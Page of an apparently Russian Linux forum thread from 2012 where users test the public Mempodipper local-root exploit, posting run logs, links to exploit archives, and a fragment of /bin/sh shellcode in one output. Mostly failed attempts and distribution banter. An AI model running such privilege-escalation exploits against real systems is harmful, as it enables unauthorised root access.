mem Write

0

1

для тех кто не ходит по ссылкам

Mempodipper - Linux Local Root for >=2.6.39, 32-bit and 64-bit

Ссылка

←	[jabber][android]Есть ли....

В поисках адекватного тонкого нетбука

→

← 1 2 →

Арч, сегфолтится :(


unfo@unfo-job:~/tmp> ./a.out 
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/12933/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401a60.
[+] Calculating su padding.
[+] Seeking to offset 0x401a43.
[+] Executing su with shellcode.
Ошибка сегментирования

unfo@unfo-job:~/tmp> ls -l /bin/su
-r-sr-xr-x 1 root root 41359 янв.   8 09:44 /bin/su

unfo ★★★★★★★★★★★
(23.01.12 16:32:13 MSK)

Ответ на: комментарий от unfo 23.01.12 16:32:13 MSK

ls -l /bin/su можно и не показывать было, проблема не в этом

~~xtraeft~~ ★★☆☆
(23.01.12 16:35:43 MSK) автор топика

Ссылка

Ответ на: комментарий от aidaho 23.01.12 11:59:30 MSK

Гип-гип, ура! Я только вчера думал, какой поставить из бэкпортов: 38 или 39 (на 32 гибернация не пашет). Поставил 38. Оказался прав.

bk_ ★★
(23.01.12 16:47:06 MSK)

Ответ на: комментарий от bk_ 23.01.12 16:47:06 MSK

У меня с 32 всё работает, так что до выхода Wheezy бампать ядро не буду.

aidaho ★★★★★★★★
(23.01.12 17:17:36 MSK)

Ответ на: комментарий от AndreyKl 23.01.12 13:08:56 MSK

кстати, есть реализации этого эксплойта не читающие /bin/su

~~xtraeft~~ ★★☆☆
(23.01.12 17:23:33 MSK) автор топика

Ссылка

Сегфолтится. :)

pekmop1024 ★★★★★★★★★★★
(23.01.12 17:25:35 MSK)

Ссылка

Ну вот ~~нах~~ как так жить, товарищи?

[15:18] fletch@helix ~\ $ uname -a
Linux helix 3.1.9-2-ARCH #1 SMP PREEMPT Sat Jan 14 09:11:37 CET 2012 x86_64 AMD Athlon(tm) II X2 250 Processor AuthenticAMD GNU/Linux
[15:18] fletch@helix ~\ $ ./mempodipper 
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/7913/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401a60.
[+] Calculating su padding.
[+] Seeking to offset 0x401a3e.
[+] Executing su with shellcode.
Ошибка сегментирования
[15:18] fletch@helix ~\ $ ls -la /bin/su
-r-sr-xr-x 1 root root 41359 янв.   8 07:44 /bin/su

+не дебианом единым:

watcher ~ # uname -a
Linux watcher 3.2.1-gentoodvb #1 SMP Sat Jan 14 16:14:57 EET 2012 i686 AMD Athlon(tm) 64 X2 Dual Core Processor 4200+ AuthenticAMD GNU/Linux
watcher ~ # ls -la /bin/su
-rws--x--x 1 root root 30940 Ноя  2 01:14 /bin/su
fletch@watcher ~ $ ./mempodipper 
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/14592/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[-] Could not resolve /bin/su. Specify the exit@plt function address manually.
[-] Usage: ./mempodipper -o ADDRESS
[-] Example: ./mempodipper -o 0x402178

Шел 2012 год, а в стереотипах как и прежде арч был падуч, гента летуча, а дебиан стабилен как ~~говно мамонта~~ памятник Ленину.

Fletch ★★
(23.01.12 17:34:33 MSK)

Ссылка

Ответ на: комментарий от xtraeft 23.01.12 16:26:24 MSK

я говорил о том, что рабочие локал рут эксплойты были, есть и будут

отлично работающие

да, согласен.

AndreyKl ★★★★★★
(23.01.12 17:46:06 MSK)

Ссылка

[michael@rufi dev]$ uname -a
Linux rufi 3.2.1-1-ARCH #1 SMP PREEMPT Fri Jan 13 06:50:31 CET 2012 x86_64 Celeron(R) Dual-Core CPU T3300 @ 2.00GHz GenuineIntel GNU/Linux
[michael@rufi dev]$ ./exploit 
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2057/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401a60.
[+] Calculating su padding.
[+] Seeking to offset 0x401a43.
[+] Executing su with shellcode.
Ошибка сегментирования

Deleted
(23.01.12 17:53:03 MSK)

Ссылка

Ответ на: комментарий от aidaho 23.01.12 17:17:36 MSK

У меня на 32 работает, но как-то через раз. То уходит в гибернацию, своп создает, но сам комп не выключается и виснет на черной консоли.

Вырубаю комп (ноут), включаю - из свопа восстанавливается. Но каждый раз вырубать ноут вручную достает.

bk_ ★★
(23.01.12 18:11:00 MSK)

Ссылка

> http://seclists.org/fulldisclosure/2012/Jan/354
не работает, ошибок не выдает

> http://www.exploit-db.com/exploits/18411/

# Tested on: Gentoo, Ubuntu

gentoo 3.2.1 не работает

$ ls -l /bin/su
-rws--x--x 1 root root 36680 Янв 20 20:34 /bin/su

Kadi ★
(23.01.12 18:12:43 MSK)

Ответ на: комментарий от Kadi 23.01.12 18:12:43 MSK

другой вариант (+r у /bin/su)

$ ./a.out 
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/7059/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x402100.
[+] Calculating su padding.
[+] Seeking to offset 0x4020e5.
[+] Executing su with shellcode.
Неизвестный id: H1��iH1��j@�@��!H�//bin/shH�SH��H1�f�-iSH��H1�PQWH��H1Ұ;

Kadi ★
(23.01.12 18:15:06 MSK)

Ссылка

на арче не завелось

[kirill@Arch ~]$ uname -sr
Linux 3.1.6-1-ARCH
[kirill@Arch ~]$ ./a.out 
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2442/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x8049180.
[+] Calculating su padding.
[+] Seeking to offset 0x8049177.
[+] Executing su with shellcode.
Segmentation fault
[kirill@Arch ~]$

asket82
(23.01.12 18:17:49 MSK)

Ссылка

интересно, сколько чукчей будет еще бездумно запускать пробный сплойт

~~xtraeft~~ ★★☆☆
(23.01.12 18:30:09 MSK) автор топика

Ответ на: комментарий от xtraeft 23.01.12 18:30:09 MSK

Так они ещё после того, как он и них не заработает, будут кричать что у них нет этой уязвимости. «Блажен кто верует» :)

cool_hedin ★
(23.01.12 19:42:50 MSK)

Ссылка

Linux Local Root for >=2.6.39, 32-bit and 64-bit

$ uname -a
Linux optima 2.6.32-5-amd64 #1 SMP Wed Jan 12 03:40:32 UTC 2011 x86_64 GNU/Linux
$ cat /etc/issue
Debian GNU/Linux 6.0 \n \l

pacify ★★★★★★
(24.01.12 02:38:23 MSK)

Ссылка

Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.

← 1 2 →

←	[jabber][android]Есть ли....

Talks

В поисках адекватного тонкого нетбука

→

Похожие темы